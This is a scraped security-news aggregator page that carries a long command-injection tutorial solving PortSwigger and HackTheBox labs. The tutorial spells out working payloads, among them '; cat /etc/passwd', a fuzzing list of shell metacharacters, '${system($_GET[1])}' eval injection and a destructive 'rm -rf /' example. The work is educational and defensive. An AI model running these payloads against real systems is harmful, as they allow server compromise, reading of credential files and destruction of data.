IT asset management is no longer just about tracking software licenses — it now plays a critical role in cloud cost management, cybersecurity, and compliance.

by ITPro Today

Morphisec uncovers a new ValleyRAT malware variant with advanced evasion tactics, multi-stage infection chains, and novel delivery methods…

by Hackread

As cloud security evolves in 2025 and beyond, organizations must adapt to both new and evolving realities, including the increasing reliance on cloud infrastructure for AI-driven workflows and the vast quantities of data being migrated to the cloud. But there are other developments that could impact your organizations and drive the need for an even more robust security strategy. Let’s take a

by The Hacker News

Reimagining your SOC Part 2/3: This blog explores how the challenges facing the modern SOC can be addressed by transforming the investigation process, unlocking efficiency and scalability in SOC operations with AI.

by Darktrace

Valley News Live exposed more than a million job seeker’s resumes through an open AWS S3 bucket

by Malwarebytes Labs

""Agentic"" AI could arrive in 2025, and it may allow hackers to send individual, AI-powered agents to do their dirty work.

by Malwarebytes Labs

The ThreatDown State of Malware report focuses on a few key developments that we witnessed in 2024.

by ThreatDown

Cato Networks, the SASE leader, today announced the appointment of Karl Soderlund as the company’s global channel chief. In his role at Cato, Soderlund will be responsible for leading the global channel team and further scaling the global partner program.  With 30 years of experience in the cybersecurity and networking industries, Soderlund has a proven […] The post Cato Networks Appoints Karl Soderlund as Global Channel Chief to Accelerate Channel Growth in SASE Market appeared first on IT Security Guru.

by IT Security Guru

Taiwan has become the latest country to ban government agencies from using Chinese startup DeepSeek''s Artificial Intelligence (AI) platform, citing security risks. ""Government agencies and critical infrastructure should not use DeepSeek, because it endangers national information security,"" according to a statement released by Taiwan''s Ministry of Digital Affairs, per Radio Free Asia. ""DeepSeek

by The Hacker News

Welcome to the Top 10 Web Hacking Techniques of 2024, the 18th edition of our annual community-powered effort to identify the most innovative must-read web security research published in the last year

by PortSwigger Research

Organizations and development teams need to evolve from "being prepared" to "managing the risk" of security breaches.

by Dark Reading

If you want additional ransomware protection on your machine, you should use one that offers thorough scans, a user-friendly interface, and compatibility with your preferred operating system.

by ZDNET Security

A security vulnerability has been disclosed in AMD''s Secure Encrypted Virtualization (SEV) that could permit an attacker to load a malicious CPU microcode under specific conditions. The flaw, tracked as CVE-2024-56161, carries a CVSS score of 7.2 out of 10.0, indicating high severity. ""Improper signature verification in AMD CPU ROM microcode patch loader may allow an attacker with local

by The Hacker News

A massive data breach at online betting platform 1win has now been confirmed by Have I Been Pwned (HIBP), affecting over 96 million users worldwide. The leaked data, which includes email addresses, phone numbers, IP addresses, dates of birth, geographic locations, and SHA-256 hashed passwords, has been circulating on hacking forums since November 2024. Reports … The post Data Breach at Betting Platform 1win Exposed 96 Million Users appeared first on CyberInsider.

by Cyber Insider

Green software development represents an untapped opportunity for many organizations. It can dial up performance and slash costs.

by ITPro Today

Today, we are launching a new dedicated “AI Insights” page on Cloudflare Radar that incorporates this graph and builds on it with additional metrics.

by Cloudflare

Have you ever wished you had an assistant at your security operations centers (SOCs) — especially one who never calls in sick, has a bad day or takes a long lunch? Your wish may come true soon. Not surprisingly, AI-driven SOC “co-pilots” are topping the lists for cybersecurity predictions in 2025, which often describe these […] The post How AI-driven SOC co-pilots will change security center operations appeared first on Security Intelligence.

by Security Intelligence

In a previous Trustwave SpiderLabs’ blog, we explored how cybercriminals exploit Facebook Messenger chatbots to execute social engineering attacks, deceiving users into falling victim to scams and phishing schemes. These attacks often rely on the perceived legitimacy of automated systems to manipulate users into sharing sensitive information.

by SpiderLabs Blog

The cybersecurity landscape in EMEA is facing a wave of AI-driven cyber warfare, the evolution of ransomware into data extortion, and an expanding attack surface in cloud environments, according to the latest findings from Check Point Software. The company presented its insights at CPX Vienna 2025, an annual cybersecurity event bringing together industry leaders, security […] The post AI-Powered Cyber Warfare, Ransomware Evolution, and Cloud Threats Shape 2025 Cyber Landscape appeared first on IT Security Guru.

by IT Security Guru

Arctic Wolf® and BlackBerry Limited today announced the successful closing of the acquisition of BlackBerry’s Cylance® endpoint security assets by Arctic Wolf. The two companies entered into a definitive agreement on December 15, 2024. “We are pleased to have successfully closed this pivotal transaction for BlackBerry and look forward to continuing our relationship with Arctic Wolf as a […] The post Arctic Wolf and BlackBerry Announce Closing of Acquisition for Cylance appeared first on IT Security Guru.

by IT Security Guru

Austin, TX, USA, 4th February 2025, CyberNewsWire

by Hackread

Zyxel urged users to replace their old devices with modern, supported versions.

by Cybersecurity Dive

Atomic Stealer, Poseidon Stealer and Cthulhu Stealer target macOS. We discuss their various properties and examine leverage of the AppleScript framework. The post Stealers on the Rise: A Closer Look at a Growing macOS Threat appeared first on Unit 42.

by Palo Alto Networks - Unit42

Overview NETGEAR has recently addressed two critical security vulnerabilities affecting its products, which, if exploited, could allow unauthenticated attackers to execute arbitrary code or remotely exploit devices. These vulnerabilities impact multiple models, including the XR series routers and WAX series access points. Given the high severity of these vulnerabilities, with Common Vulnerability Scoring System (CVSS) scores of 9.8 and 9.6, users are strongly advised to update their devices immediately to the latest firmware versions to prevent potential cyber threats. Details of the Security Vulnerabilities The vulnerabilities impact several NETGEAR devices and could allow remote attackers to take control of the affected routers and access points without requiring authentication. Such security flaws are particularly concerning as they can be leveraged for malicious activities, including data theft, network disruption, and unauthorized surveillance. Affected Devices and Firmware Updates NETGEAR has released fixes for the unauthenticated remote code execution (RCE) security vulnerability affecting the following models: XR1000: Fixed in firmware version 1.0.0.74 XR1000v2: Fixed in firmware version 1.1.0.22 XR500: Fixed in firmware version 2.3.2.134 NETGEAR strongly recommends that all users of these models download and install the latest firmware as soon as possible. Steps to Update Your Firmware To ensure your NETGEAR device is secure, follow these steps to update your firmware: Visit the NETGEAR Support website. Enter your device’s model number in the search box and select the correct model from the drop-down list. Click on downloads. Under Current Versions, select the download that begins with Firmware Version. Click download and follow the provided installation instructions in the product’s user manual or firmware release notes. Keeping your firmware updated is essential to maintaining the security and functionality of your device. Why These Vulnerabilities Are Critical Remote Code Execution (RCE): This type of vulnerability allows attackers to execute arbitrary commands remotely on the affected device, potentially leading to full device compromise. Unauthenticated Exploitation: The vulnerabilities do not require authentication, making them highly dangerous as attackers can exploit them without needing login credentials. Network Compromise: Once compromised, an attacker could intercept, modify, or reroute network traffic, potentially leading to data breaches, espionage, or further attacks on connected devices. Given these risks, failing to apply the recommended firmware updates could leave users vulnerable to cyber threats, including botnet infections, malware deployment, and unauthorized access to sensitive information. Security Advisory and NETGEAR’s Stance NETGEAR has released a security advisory under the identifier PSV-2023-0039, urging all affected users to take immediate action. Although no official CVE (Common Vulnerabilities and Exposures) IDs have been assigned, the company acknowledges the seriousness of these security issues. Acknowledgments The vulnerabilities were identified and reported through BugCrowd, a well-known security research platform specializing in vulnerability discovery and responsible disclosure. NETGEAR has rated the vulnerabilities as critical, with the CVSS score breakdown as follows: CVSS Score: 9.8 (Critical) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L Best Practices for Keeping Your Devices Secure To enhance security and prevent similar threats in the future, users should follow these best practices: Regular Firmware Updates: Always keep your device’s firmware up to date. Firmware updates often include security patches that address known vulnerabilities. Use NETGEAR’s Mobile Apps for Updates: Orbi products: Use the NETGEAR Orbi app. WiFi routers: Use the NETGEAR Nighthawk app. Business products: Use the NETGEAR Insight app (firmware updates through this app require an Insight subscription). Manual Firmware Updates: If your device is not supported by one of the apps, follow the manual update process via the official NETGEAR website. Enable Automatic Updates: If available, enable automatic firmware updates to ensure you receive security patches as soon as they are released. Change Default Credentials: If you haven’t already, change the default administrator credentials on your NETGEAR device to a strong, unique password. Monitor Network Activity: Keep an eye on unusual network behavior, such as unexpected reboots, unknown connected devices, or sudden drops in performance, which could indicate potential exploitation. NETGEAR’s prompt response and security advisory highlight the need for users to remain vigilant and prioritize regular firmware updates to protect against emerging threats. By taking the recommended steps, users can safeguard their devices from unauthorized access and maintain the integrity of their network security. Source: https://jocert.ncsc.jo/EN/ListDetails/Security_Alerts__Advisorites/1203/93 https://kb.netgear.com/000066558/Security-Advisory-for-Unauthenticated-RCE-on-Some-WiFi-Routers-PSV-2023-0039 The post NETGEAR Urges Immediate Firmware Updates for Critical Security Flaws appeared first on Cyble.

by CYBLE

Actors linked to North Korea bypassed Apple security using malware called FlexibleFerret.

by Cybersecurity Dive

Microsoft has released patches to address two Critical-rated security flaws impacting Azure AI Face Service and Microsoft Account that could allow a malicious actor to escalate their privileges under certain conditions. The flaws are listed below - CVE-2025-21396 (CVSS score: 7.5) - Microsoft Account Elevation of Privilege Vulnerability CVE-2025-21415 (CVSS score: 9.9) - Azure AI Face Service

by The Hacker News

For years, the cybersecurity headlines have been dominated by news of sophisticated phishing campaigns and zero-day exploits. But behind these attention-grabbers lurks a far more subtle and explosive evolution in adversarial behavior. Today, we are proud to introduce the Red Report 2025, the fifth edition of our annual threat analysis from Picus Labs. This year’s key revelation? A massive uptick in infostealing malware and multi-stage “heist-style” campaigns that are pushing the boundaries of stealth and persistence, while actual AI-driven attacks remain more hype than reality.

by Picus Security

Google has shipped patches to address 47 security flaws in its Android operating system, including one it said has come under active exploitation in the wild. The vulnerability in question is CVE-2024-53104 (CVSS score: 7.8), which has been described as a case of privilege escalation in a kernel component known as the USB Video Class (UVC) driver. Successful exploitation of the flaw could lead

by The Hacker News

U.S. food delivery giant Grubhub says hackers accessed the personal details of customers and drivers after breaching its internal systems.  Grubhub is a popular food-ordering and delivery platform with more than 375,000 merchants and 200,000 delivery providers using its platform in more than 4,000 U.S. cities. New York-based Wonder Group acquired the company last fall […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Grubhub has disclosed a data breach stemming from a security incident involving a third-party service provider. The breach resulted in unauthorized access to certain user contact information, including names, email addresses, and phone numbers, as well as partial payment card details for some campus diners. The company took immediate action to contain the breach, terminated … The post Grubhub Discloses Data Breach Exposing Customer Information appeared first on CyberInsider.

by Cyber Insider

Dedicated clouds offer businesses full control over cloud infrastructure — ideal for specialized workloads but often at a higher cost. Here''s when to choose them over private clouds.

by ITPro Today

Cybersecurity researchers have disclosed details of a now-patched vulnerability impacting the Microsoft SharePoint connector on Power Platform that, if successfully exploited, could allow threat actors to harvest a user''s credentials and stage follow-on attacks. This could manifest in the form of post-exploitation actions that allow the attacker to send requests to the SharePoint API on behalf

by The Hacker News

WhatsApp has identified a spyware campaign targeting approximately 90 individuals, including journalists and civil society members, linked to the Israeli firm Paragon Solutions. The post Israeli Spyware Firm Paragon Linked to WhatsApp Zero-Click Attack appeared first on ZENDATA Cybersecurity.

by Zendata

by ComputerWeekly

Google has released the February 2025 Android security update, addressing a total of 48 vulnerabilities, including an actively exploited zero-day flaw tracked as CVE-2024-53104. The update is available for Android 12 through Android 15 devices and contains fixes for multiple security issues across the Framework, System, Kernel, and vendor components. The actively exploited vulnerability, tracked … The post Google Fixes Zero-Day Flaw Exploited in Targeted Android Attacks appeared first on CyberInsider.

by Cyber Insider

CISA’s FOCAL Plan, which aims to standardize the cybersecurity operations of federal civilian agencies, marks an important step in the federal government''s efforts to strengthen cyber defenses and reduce agency risk. Learn how Tenable One for Government, which recently achieved FedRAMP Authorization, aligns to the FOCAL Plan key priorities. Each Federal Civilian Executive Branch (FCEB) agency has a unique role in supporting the mission of the U.S. federal government, from national security to healthcare to education. However, agencies’ approaches to managing cyber risk vary widely, with each agency operating independent networks with interconnected systems and varying degrees of cyber risk tolerance. This complexity makes managing exposures across the FCEB a complex challenge and drives the need for a coordinated cybersecurity strategy.To address this issue, the Cybersecurity and Infrastructure Security Agency (CISA) recently unveiled the “Federal Civilian Executive Branch (FCEB) Operational Cybersecurity Alignment (FOCAL) Plan.” It’s designed to enhance cybersecurity across the FCEB by standardizing essential components of operational cybersecurity throughout the federal enterprise and enabling a collective defense approach. It provides actionable steps federal agencies can take, with their varied architectures and risk management strategies, to mitigate cyber risks and improve resilience through a unified approach to operational defense. And while it is not an exhaustive list of all the things agencies must do to secure their missions, it does provide a baseline for agencies to focus resources on those actions that substantially advance operational cybersecurity improvements and alignment goals. CISA’s FOCAL Plan priority areas(Source: “Federal Civilian Executive Branch (FCEB) Operational Cybersecurity Alignment (FOCAL) Plan,” CISA, September 2024.)Asset ManagementTo safeguard federal networks, agencies must have comprehensive visibility into their entire infrastructure, and continuously assess how those assets are interconnected. As the old saying goes: “You can’t protect what you can’t see.” This priority area aims to ensure agencies know what assets they have so they can be properly defended. It’s important to remember that assets span far beyond traditional IT assets. As recent mandates and CISA Binding Operational Directives (BOD) have stressed, agencies must have visibility into OT, IoT, cloud and identity assets. Look no further than the Office of Management and Budget (OMB)’s Memorandum M-24-04 which directed federal civilian departments and agencies to inventory their IoT and OT assets by the end of fiscal year 2024.Vulnerability ManagementGetting an accurate inventory of your assets is a key first step, but it’s equally fundamental to understand the vulnerabilities on each of those assets so that you can proactively secure the attack surface. As the FOCAL Plan points out: “What constitutes an agency’s enterprise has evolved over the years, particularly as the attack surface has expanded and grown more complicated.” This has made vulnerability management more challenging. The FOCAL Plan focuses on proactive vulnerability management, so that agencies can understand their exposures by identifying, assessing and mitigating vulnerabilities across asset types, before an attacker can exploit them. Defensible ArchitectureBecause attacks are inevitable and resilience is critical, this priority area focuses on building robust, defensible infrastructures with principles like segmentation, identity management and zero-trust security. With a focus on limiting an attacker''s ability to access sensitive data when a compromise occurs, this priority aims to help agencies minimize impact and operational disruptions through the implementation of proper tools and controls. Cyber Supply Chain Risk Management (C-SCRM)FCEB agencies often rely on third-party vendors, which can introduce supply chain risk. This priority addresses the risk posed by external vendors and technologies by ensuring agencies can quickly identify, assess and mitigate vulnerable software and hardware from their suppliers and partners. Case in point: the critical Log4j vulnerability, known as Log4Shell, a critical remote code execution vulnerability in Apache’s Log4j software library. This vulnerability posed a massive risk due to the widespread use of the Apache Log4j open-source logging library in many enterprise applications and cloud services, and the ease with which the vulnerability could be exploited. In the days that followed, every agency and industry security practitioner had to detect all instances of Log4j in their environment. In many cases, versions of the offering were buried deep within third-party software packages or government off-the-shelf solutions. Agencies with a complete understanding of the software deployed across their environment were able to quickly respond to the threat, and meet or exceed the deadline established by the CISA Emergency Directive (ED) 22-02. Unfortunately, Log4Shell quickly became a crisis for security teams that did not have a complete understanding of their inventory.Incident Detection and Response This priority area is geared towards strengthening the ability of security operations centers (SOCs) to detect, respond to, and mitigate cyberattacks rapidly and effectively. As mentioned earlier, attacks are inevitable, so it’s critical to quickly detect and respond to an attack. Combining rapid detection and response with best practices such as segmentation and identity management will further disrupt an attacker''s ability to access sensitive data.Meeting CISA FOCAL Plan priorities with Tenable OneWe’re excited to share that Tenable One is now FedRAMP authorized at the moderate impact level. Tenable One for Government is an exposure management platform designed to help agencies radically unify security visibility, insight and action across the attack surface to rapidly expose and close the gaps that put agencies at risk. Tenable One for Government helps agencies meet CISA FOCAL Plan priorities with:Centralized visibility of all assets across the attack surface, from IT infrastructure to cloud environments to critical infrastructure, containers, identity systems, web applications and everywhere in between.Vulnerability enumeration and prioritization so you can pinpoint priority weaknesses and focus on the actual exposures that matter to quickly reduce cyber risk.A defensible architecture based on zero trust principles so you can quickly detect and respond to attacks in real time, map attack paths and surface all the possible steps that attackers could take to move laterally, escalate privileges and gain control of your infrastructure.A deep understanding of overall cyber risk with risk metrics and exposure scores to easily identify problem areas across your agency infrastructure. You can then set precise, trackable KPIs and SLAs to hold teams accountable for managing risk.Learn more:The white paper “CISA FOCAL Plan: Aligning Cybersecurity Across Federal Agencies with Tenable One””Tenable One for Government” datasheet

by Tenable

An investigation into more than 300 cyberattacks against US K–12 schools over the past five years shows how schools can withhold crucial details from students and parents whose data was stolen.

by WIRED Security News

Awesome 👍

by HACKLIDO

In this tutorial, we’re going to walk step by step through creating an npm package using modern best practices (as of 2022).

by Snyk

Apple’s push for shorter certificate lifespans is more than a compliance update; it’s a strategic move toward quantum-resilient security. With quantum computing threatening traditional encryption, automation and cryptographic agility are essential. Businesses that adopt automated certificate lifecycle management now will not only meet compliance but also be well-positioned for post-quantum cryptography. The shift to a 47-day certificate lifecycle is a wake-up call—those who act today will lead in the next cybersecurity era.

by Sectigo

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Edge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file while in Internet Explorer mode. The ZDI has assigned a CVSS rating of 7.5.

by Zero Day Initiative Advisories

This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute low-privileged code on the target host system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-0413.

by Zero Day Initiative Advisories

by Dark Reading

Anthropic says its Constitutional Classifiers approach offers a practical way to make it harder for bad actors to try and coerce an AI model off its guardrails.

by Dark Reading

Feeling creative? Submit your caption and our panel of experts will reward the winner with a $25 gift card.

by Dark Reading

Though Windows, iOS, and macOS users won''t need to make any changes, Android users are advised to remove their Defender VPN profiles.

by Dark Reading

Adversaries looking to ride the DeepSeek interest wave are taking advantage of developers in a rush to deploy the new technology, by using AI-generated malware against them.

by Dark Reading

Researchers at Cisco Talos warn that a new phishing campaign is targeting users in Germany and Poland in an attempt to deliver several strains of malware, including a new backdoor dubbed “TorNet.”

by KnowBe4

Cybercriminals posted nearly 6,000 breaches to data-leak sites last year — and despite significant takedowns, they continued to thrive in a record-breaking year for ransomware.

by Dark Reading

DPRK ''Contagious Interview'' campaign continues to target Mac users with new variants of FERRET malware and Github devs with repo spam. The post macOS FlexibleFerret | Further Variants of DPRK Malware Family Unearthed appeared first on SentinelOne.

by SentinelOne

Explore industry moves and significant changes in the industry for the week of February 3, 2025. Stay updated with the latest industry trends and shifts.

by SecurityWeek

This webcast originally aired on January 23, 2025. In this video, Ralph May discusses Orbit, a tool he developed for enhanced vulnerability scanning and continuous pen testing. The video delves […] The post Introducing ORBIT, Scan Targets and Clients at Scale appeared first on Black Hills Information Security.

by Black Hills Information Security

Command injection is a critical vulnerability that enables attackers to execute unauthorized commands on a system. In this blog, we’ll explore both whitebox and black box approaches for detecting and these risks. Join us as we break down effective strategies to detect this vulnerability in your infrastructure. Before we dive into this topic we must understand what is a shell metachracter and what is a payload in terms to command injection. Shell Metacharacters (Cybersecurity POV, With Example) In Linux, we use ls ; whoami to execute both commands sequentially—ls lists files, and whoami reveals the current user. Similarly, in command injection, attackers exploit shell metacharacters to sneak malicious payloads alongside valid HTTP parameters without breaking the application’s expected functionality. For example, if an app executes ping 127.0.0.1, an attacker could send ping 127.0.0.1 ; cat /etc/passwd to execute both commands while keeping the original request intact. Definition of Payload The payload consists of shell metacharacters (&, &&, |, ||, ;, \n, >, <, $()) and their URL-encoded versions (%26, %26%26, %7C, %7C%7C, %3B, %0A, %3E, %3C, %24%28%29). These characters are used to chain, execute, and manipulate commands, making them essential for testing and exploiting command injection vulnerabilities. Black Box approach To begin with blackbox refers to scenario where we don’t have access to source code and in whitebox testing we have access to source code. Now the following slide from Rana Khalil is extremely useful in understanding the black box approach. 1. OS command injection, simple case Lab URL - https://portswigger.net/web-security/os-command-injection/lab-simple First we fuzz for valid shellmeta-chracters that the application takes as input. You may use the following custom wordlist and fuzz along side each input parameters to find the shell metachracter that is accepted. This wordlist contains URL encoded values as well. /home/mccleod/custom via 🐍 v3.8.10 took 12s ❯ cat shell-metachracters.txt & && | || ; \n > < $() %26 %26%26 %7C %7C%7C %3B %0A %3E %3C %24%28%29 Now in the application, we click on every possible clicks, and we see an interesting option called check stock, and behind the scenes we notice that this is an POST request. Now let’s fuzz for shell metacharacters along side productId and storeId, and see what happens. Add payload insertion points in the following area, and make sure you have selected battering ram attack option. Make sure you copy and paste payloads from shell-metacharacters.txt. And start your attack. We see couple of interesting responses. /n and$() return numbers like 32 and 42 and the $ character does not return much anything but at same time does not give errors like the rest of the metacharacters. Note that do not do this mistake of entering payload at two points in a single instance. Why because what if productId is not vulnerable but storeId is? in that case we have to separately fuzz for each point, as a rule of thumb remember always fuzz one parameter or one endpoint at a time. We see interestingly ; character gives us insight of an shell script and interesting details like the location of the script. The same holds true even ; character is URL encoded. Finally after a lot of trail and error we see that payloads with metacharacters like %oa, | and ; work in the payload. Even the url -encoded ones work well in this lab With this we solve the lab. But remember when we fuzzed with ; value as input, we found the location of an shell script? Let’s take an look at the script for better understanding on why this command injection vulnerability arises. Now if we use cat linux command to have a look at stockreport.sh then we see that eval function is used. Using eval on unsanitized input allows arbitrary code execution, enabling an attacker to inject and execute malicious commands. 2.Lab: Blind OS command injection with time delays Lab URL : https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays Now this lab is very much similar to previous one, this labs acts like an good reinforcement for the things and methodology we have learnt from the previous lab. Step 1: Click all button and look for interesting requests and/or endpoints. Step 2: Once the endpoint is found, now fuzz all input field with shell-metachracters to find which one will work. Step 3: Once you find the valid shell metachracter like | or ; now it’s time to test for command injection. Try with payloads like ;whoami or |whoami Step 4: Since this lab has something to do with time delays, we try some commands like sleep or pinging localhost that way this entire thing runs on loops. sleep 10 ping -c 127.0.0.1 Now looking at burp suite, unlike previous lab we don’t have check stock but on to our right hand top corner, we see something called submit a feedback. Let’s try that out With trial and error, we find that email parameter is vulnerable to command injection. But something is very wrong and is not working. Even if we URL-ENCODE the characters like ; sleep 10 or | sleep 10 then we are not still getting the delay. Remember we used delimited in sql injection to comment out the errors from the sql syntax which we give as input? In command injection we can use # or the hash symbol to comment out the errors. When we use # and url encode it with ctrl+u then we get time delay for 10 seconds which solves our lab. 3. Blind OS command injection with output redirection Lab URL - https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection Some of you who will read this section might feel like this is CTFish, or you might even ask what’s the point of output redirection if I can execute my command directory in to the server? Well you got a point, and the only reason I have included this is because it forced me to think out side of the box, and made me wonder can we take command injection beyond simply executing arbitrary commands on the server? Well the answer is yes ,and in this lab we are going to execute our command, redirect the output of the commend to a text file and via LFI or local file inclusion we are going to read output. Let that sink in for a moment and if this sounds too bizarre then by the end of this section I hope it is clear. On the first glances, we see an feedback form similar to last or previous exercise. Now we can fuzz for metachracters like |, ||, ; etc, and on each parameter, and we see that in name parameter if we try something like ;whoami or |whoami server responds with message could not save. Since we don’t have access to the source code, our best bets is to consider that the application might be configured in a way where output is not displayed, unless saved. Recall that you can use > operator or >> in linux to save output to a text file, let’s do that here as well. Still we are getting the same error. We have redirected the output to /var/www/images which is given at the lab description and we are creating a new file called output.txt and note that > creates an new text file. Now let’s use # delimiter for commenting out errors. We are still getting the error, therefore our last resort is to encode things with URL so that the server understands and responds well. You can use ctrl+u to URL decode on burp suite. Now we see that our payload gets processed well and in case if there is any error just reset or restart the lab. Feel feel to try other shell metacharacters like & and so on. Now how are we going to retrieve or get the file? Well lets look round the webpage, we see a lot of images, if we right click and view the image the URL becomes something like the following below. https://0a3c008f04204dc4821d792b006b008e.web-security-academy.net/image?filename=7.jpg Do you see the parameter ?filename=7.jpg? what if we change the 7.jpg to output.txt? Will we be able to get files from that specific directory which is /var/www/images? Let’s try that out. When we change the filename to output.txt we see the output for whoami command and with this we solve the lab. White box approach 1. Looking Glass Lab URL - https://app.hackthebox.com/challenges/looking%20glass/ At first glances are are given an website that pings IP address, and notice how realistic the output for ping is, it feels like exactly as if ping command is executed on linux machine and the output is displayed. If ping command can be executed then what if other linux command might be executed by the server? Well let’s try it with the following command…. 10.30.18.29; ls ../ We see that the with basic shell metacharacter we are able to execute any linux command. So let’s not quickly waste time and get the flag. We can use cat command to read out the flag for us. 10.30.18.29; cat ../flag_b1ubZ With this we get our flag. But things are not so fun, we just got flag by basic linux command, that is definitely not interesting. Source Code Analysis Since we can execute commands, let’s have a look at what other files are present in the directory in which we are present. 10.30.18.29; ls We see a file called index.php and let’s read the source code. Now with the help of following command we can directly read our index.php file. 10.30.18.29; cat index.php With the above command we get source code to index.php. Our eyes are fixated on runTest function which looks exactly like the following lines. function runTest($test, $ip_address) { if ($test === ''ping'') { system(""ping -c4 ${ip_address}""); } if ($test === ''traceroute'') { system(""traceroute ${ip_address}""); } } The PHP code is vulnerable to command injection in both its ping and traceroute features because it uses unsanitized user input directly in shell commands. Specifically, the runTest function takes the user-controlled value from $POST[‘ip_address’] and inserts it without any filtering into commands like system(""ping -c4 ${ip_address}"") and system(""traceroute ${ip_address}""). This lack of validation or sanitization means that an attacker could append shell operators (such as ;, &&, or |) to the ip_address input to run arbitrary commands (for example, 8.8.8.8; rm -rf /). Additionally, although the input field is pre-filled with the user’s IP address via <?= getUserIp() ?>, it remains editable, allowing anyone to change it to a malicious value. 2. TimeKORP Lab URL - https://app.hackthebox.com/challenges/TimeKORP Now before we dive into technicalities lets have a look at possible payloads that work. ''+%0a+cat+/flag+%0a+'' ''%3b+cat+/flag+||+'' ''%3b+cat+/flag+%3b+%23'' ''%3b+cat+/flag+%3b'' Logic for this payload is based on the source code. To sum up simply payload consists of the following things [singlequote][space][shell-metacharacter][space]cat /flag[space][shellmetacharacter][singlequote] Now let’s deep dive into the source code to understand why things work and why we have come up with this payload. Do remember even if this challenge is labelled as very easy, it gets tricky, and some of the shell metacharacters like & may not work. What’s more worse is ls and other linux command might not give anything meaningful Now the source code for this challenge is no longer on the hackthebox platform but Cryptocat breaks it down for us. Feel free to check out his youtube video. Source Code Analysis In TimeController.php: $format = isset($_GET[''format'']) ? $_GET[''format''] : ''%H:%M:%S''; $time = new TimeModel($format); In TimeModel.php: public function __construct($format) { $this->command = ""date ''+"" . $format . ""'' 2>&1""; } public function getTime() { $time = exec($this->command); return isset($time) ? $time : ''?''; } After glancing at TimeController.php and TimeModel.php we come to following conclusion: Direct User Input in Shell Command: The user-supplied format parameter is concatenated directly into a shell command. Shell Command Execution: The code uses PHP’s exec() function to run the command, forming date ''+[user_input]'' 2>&1. How the Exploit Works When an attacker sends a payload like +%0a+cat+/flag+%0a+: %0a represents a newline. The command becomes: date ''+ cat /flag '' 2>&1 Similarly, payloads like ; cat /flag ; inject additional commands using ; as a separator. Although the injection might succeed, “Permission denied” errors occur because the web app runs under restricted permissions, preventing access to sensitive files. This is a classic command injection vulnerability (CWE-78) caused by insufficient input sanitization and validation. 3. LoveTok Lab URL - https://app.hackthebox.com/challenges/LoveTok/walkthroughs Now we have format parameter in this application and we have come up with unique payload by understanding the source code. First let’s have a look at the payload. Then we will deep dive into the inner mechanics /?format=${system($_GET[1])}&1=whoami ${system($_GET[cmd])}&cmd=ls / We see that despite the error, we were able to execute commands like whoami successfully into the web application. Source Code Analysis We are given zip code for this application and there are four main php pages that grab our attention and they are: a. TimeModel.php class TimeModel { public function __construct($format) { // The format string is “sanitized” by addslashes $this->format = addslashes($format); // A time offset string is built using random values. [ $d, $h, $m, $s ] = [ rand(1, 6), rand(1, 23), rand(1, 59), rand(1, 69) ]; $this->prediction = ""+${d} day +${h} hour +${m} minute +${s} second""; } public function getTime() { // The critical part: eval() is used to build a date string eval(''$time = date(""'' . $this->format . ''"", strtotime(""'' . $this->prediction . ''""));''); return isset($time) ? $time : ''Something went terribly wrong''; } } What’s happening here in the above piece of code? Input Handling: The constructor accepts a $format parameter. It uses addslashes() to escape certain characters (e.g., quotes, backslashes). However, escaping with addslashes() is not enough when the input is later used in an eval() context. Dynamic Code Construction: In getTime(), the code builds a PHP statement that calls date(). It concatenates the (escaped) format string directly into the code string and then passes it to eval(). Risk: Because eval() executes its input as PHP code, any code injection in $format will be executed on the server. b. TimeController.php class TimeController { public function index($router) { // Directly taking a GET parameter and passing it to TimeModel $format = isset($_GET[''format'']) ? $_GET[''format''] : ''r''; $time = new TimeModel($format); return $router->view(''index'', [''time'' => $time->getTime()]); } } What’s happening here in the above piece of code? The controller takes the format parameter from the URL (i.e., user input) and passes it directly to the TimeModel without further sanitization. This means an attacker can supply a malicious string in the format parameter. c. index.php and Router.php // index.php snippet: date_default_timezone_set(''UTC''); spl_autoload_register(function ($name){ if (preg_match(''/Controller$/'', $name)) { $name = ""controllers/${name}""; } else if (preg_match(''/Model$/'', $name)) { $name = ""models/${name}""; } include_once ""${name}.php""; }); $router = new Router(); $router->new(''GET'', ''/'', ''TimeController@index''); $response = $router->match(); die($response); What’s happening here in the above piece of code? The file sets up autoloading for classes, defines a basic route (mapping the root URL / to TimeController@index), and then processes the request. There is no additional sanitization here—the vulnerability propagates from the user input all the way down into the TimeModel. 2. How the Exploit Payload Works The payload given is: /?format=${system($_GET[1])}&1=whoami Let’s break it down: a. The Payload Components format parameter: The value passed is ${system($_GET[1])} In the context of the code, after addslashes(), the value still ends up inside a string that is eventually passed to eval(). 1 parameter: This parameter is set to whoami. It is accessed within the injected code via $_GET[1]. b. Injection Mechanics String Creation: The user-supplied format parameter (after addslashes()) remains essentially ${system($_GET[1])}. Even though some characters are escaped, the dangerous code is still there. Using eval(): When eval() is called, it builds and executes a PHP statement that looks like: $time = date(""${system($_GET[1])}"", strtotime(""..."")); Because the string is double-quoted, PHP processes the ${...} syntax, executing the code inside it. Code Execution: The expression ${system($_GET[1])} triggers the system() function with the parameter $_GET[1]. Since the URL provides &1=whoami, it executes system(""whoami""). Result: The output of the whoami command is displayed, proving that arbitrary commands can be executed on the server. 3. Why addslashes() Fails Here Purpose of addslashes(): This function is designed to escape quotes and backslashes so that strings can be safely used in contexts like database queries (preventing simple SQL injection). Inadequacy for eval(): addslashes() does not neutralize PHP code when that code is later executed by eval(). The dangerous parts (e.g., ${...} syntax for variable and function calls) are not removed. As such, even after escaping, the malicious string still results in executable PHP code within the eval() call. Where to go from here? One thing that you can do is to start doing these challenges along side as you are reading blog, and if you are someone who have already done most or all of these challenges then feel free to try a challenge called hsa from hackthebox which revolves around understanding the source code, and we have to apply the concept of command injection via output redirection which we have learnt from lab 3. One of the common questions that I struggled with is how much programming or coding is required in cybersecurity? and some say we don’t but if you are planning to do web application pentesting, then learning to review and find vulnerabilities in source code is an valuable skill. That being said if definitely helps to come or have an developer background, but does not have to be always the case. Atleast one should be familiar with reading of code and understanding what is happening under the hood, or at bare minimum one should be willing to dig into the bits of code and deepen one’s 